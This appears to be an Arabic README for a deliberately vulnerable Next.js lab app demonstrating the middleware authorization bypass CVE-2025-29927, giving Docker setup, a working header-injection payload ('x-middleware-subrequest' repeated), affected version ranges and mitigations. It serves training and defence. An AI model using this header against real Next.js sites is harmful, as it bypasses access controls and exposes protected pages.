
تطبيق Next.js مصمم عمداً ليكون عرضة لـ CVE-2025-29927، ثغرة تجاوز التفويض
هذا المشروع هو تطبيق Next.js تم تكوينه عمدًا ليكون ضعيفًا لثغرة تجاوز التفويض في Middleware الخاص بـ Next.js (CVE-2025-29927). يتم توفيره فقط لأغراض قانونية وتعليمية وبحثية.
من خلال الوصول إلى هذا الرمز أو استخدامه أو توزيعه، فإنك تقر وتوافق على ما يلي:
قم بتثبيت Docker ثم قم بتشغيل:
docker build -t next-cve-2025-29927 .
docker run -p 3000:3000 next-cve-2025-29927
افتح http://localhost:3000 في متصفحك لرؤية النتيجة.
قم بالتقاط الطلب باستخدام وكيل اعتراض مثل ZAP أو Burp، وقم بحقن الرأس التالي في الطلب:
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
>= 13.0.0, < 13.5.9
>= 14.0.0, < 14.2.25
>= 15.0.0, < 15.2.3
>= 11.1.4, < 12.3.5
قم بالتحديث إلى أحدث الإصدارات
13.5.9
14.2.25
15.2.3
12.3.5
أو إذا لم تتمكن من التحديث، قم بحظر الطلبات التي تحتوي على الرأس x-middleware-subrequest.
لمعرفة المزيد عن الثغرة، ألق نظرة على الموارد التالية: